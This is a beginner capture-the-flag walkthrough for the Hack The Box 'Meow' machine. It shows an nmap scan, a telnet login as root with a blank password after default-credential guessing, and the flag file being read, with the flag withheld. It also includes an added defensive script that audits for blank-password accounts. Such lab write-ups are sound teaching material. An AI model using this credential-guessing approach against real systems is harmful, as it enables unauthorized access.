The aim of this walkthrough is to provide help with the Meow machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
Question: What does the acronym VM stand for?
A simple internet search should suffice for this task.
Question: What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
Same as before, use the internet.
Question: What service do we use to form our VPN connection into HTB labs?
There are multiple documents on the Hack The Box website describing the various ways you can connect to the target machine.
Question: What is the abbreviated name for a ’tunnel interface’ in the output of your VPN boot-up sequence output?
One way to figure that out is to list all your network interfaces. You could do this with the ifconfig command.
Question: What tool do we use to test our connection to the target with an ICMP echo request?
A quick search on the internet should get you the answer.
Question: What is the name of the most common tool for finding open ports on a target?
Just like in the previous task, use the internet.
Question: What service do we identify on port 23/tcp during our scans?
Simply use nmap to scan the top 1000 ports on the target machine.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap 10.129.30.251
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 09:06 BST
Nmap scan report for 10.129.30.251
Host is up (0.064s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
23/tcp open  telnet
Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Only one port seems to be open:
Question: What username is able to log into the target over telnet with a blank password?
We can use the telnet command to connect to the service. Once connected, try out some common username:password pairs.
The first pair I tried, user:password, was a bust, but for the second, root:root, I did not even have to provide the password.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $telnet 10.129.30.251 23
Trying 10.129.30.251...
Connected to 10.129.30.251.
Escape character is '^]'.
  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█
Meow login: user
Password:
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Thu 04 May 2023 08:16:35 AM UTC
  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.30.251
  IPv6 address for eth0: dead:beef::250:56ff:fe96:247c
 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.
   https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May  4 08:15:52 UTC 2023 on pts/0
root@Meow:~#
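The blank-password login shown above is a condition a defender can audit for directly. The following is an added example, not part of the original walkthrough: it reads shadow- and passwd-format files and reports accounts that have an empty password field and an interactive shell. The function names and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): list accounts that can log in
# with a blank password, given shadow- and passwd-format files.

# audit_blank_passwords SHADOW_FILE PASSWD_FILE
# Prints one line per account whose shadow password field is empty and whose
# login shell is interactive; UID 0 accounts are tagged CRITICAL.
audit_blank_passwords() {
    awk -F: '
        # Shadow file: field 2 empty means no password is required.
        # "!" or "*" there means the account is locked, so those are skipped.
        FILENAME == ARGV[1] { if ($2 == "") blank[$1] = 1; next }
        # Passwd file: keep blank-password users that have a real shell.
        ($1 in blank) && $7 !~ /(nologin|false)$/ {
            printf "%s uid=%s shell=%s%s\n", $1, $3, $7,
                   ($3 == 0 ? " CRITICAL" : "")
        }
    ' "$1" "$2"
}

# write_sample_files DIR
# Constructed sample data (not taken from the target machine).
write_sample_files() {
    cat > "$1/shadow" <<'EOF'
root::18795:0:99999:7:::
daemon:*:18375:0:99999:7:::
svc-backup::18795:0:99999:7:::
alice:$6$constructedsalt$constructedhash:18795:0:99999:7:::
bob:!:18795:0:99999:7:::
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
svc-backup:x:998:998::/var/backups:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
EOF
}

# Demo run against the constructed files.
demo_dir=$(mktemp -d)
write_sample_files "$demo_dir"
audit_blank_passwords "$demo_dir/shadow" "$demo_dir/passwd"
rm -rf "$demo_dir"
```

On a real host the same function can be pointed at /etc/shadow and /etc/passwd from a root shell.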
Question: Submit root flag
Once we have logged in via telnet, we find ourselves with root privileges in the root home directory.
Simply listing all the files in your directory will reveal the flag. Grab it to continue.
root@Meow:~# ll
total 36
drwx------  5 root root 4096 Jun 18  2021 ./
drwxr-xr-x 20 root root 4096 Jul  7  2021 ../
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache/
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local/
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Mar 26  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Apr 21  2021 snap/
root@Meow:~# cat flag.txt
<flag>
root@Meow:~#
Make sure to terminate the target box before you continue with the next machine!